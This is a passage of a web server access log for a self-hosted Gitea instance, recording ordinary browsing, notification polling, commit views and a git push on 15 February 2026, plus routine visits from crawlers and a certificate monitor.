Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[15/Feb/2026:02:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11445] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[15/Feb/2026:02:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11445] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11440] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 3036] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11440] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11440] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 18426] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:11:29 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 91.231.89.120] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:12:53 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:02:12:54 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:02:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:02:13:17 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:02:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11892] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 222.117.41.51] [Length 405168] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:37 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 64.15.129.124] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 192.175.111.235] [Length 13740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" -[15/Feb/2026:02:14:39 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 64.15.129.115] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 64.15.129.118] [Length 13740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" -[15/Feb/2026:02:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 43.173.187.99] [Length 5676] [Gzip 2.43] [Sent-to 192.168.0.250] "CT-Monitor/1.0" "-" -[15/Feb/2026:02:14:41 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 64.15.129.111] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:41 +0000] - 301 301 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 192.175.111.243] [Length 58] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/favicon.ico" -[15/Feb/2026:02:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 192.175.111.243] [Length 4335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/favicon.ico" -[15/Feb/2026:02:14:43 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 192.175.111.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 192.175.111.244] [Length 13740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" -[15/Feb/2026:02:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 64.15.129.104] [Length 13740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:46 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 192.175.111.252] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 64.15.129.107] [Length 13740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" -[15/Feb/2026:02:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 91.231.89.35] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 222.117.41.51] [Length 27590] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20166] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 91.231.89.123] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 91.196.152.68] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 91.231.89.33] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:19:36 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.42] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:20:43 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 91.231.89.39] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:21:02 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 91.231.89.35] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 91.196.152.155] [Length 2138] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 91.196.152.59] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:27:32 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.59] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 91.196.152.80] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:28:52 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.87] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:02:35:10 +0000] - 200 200 - 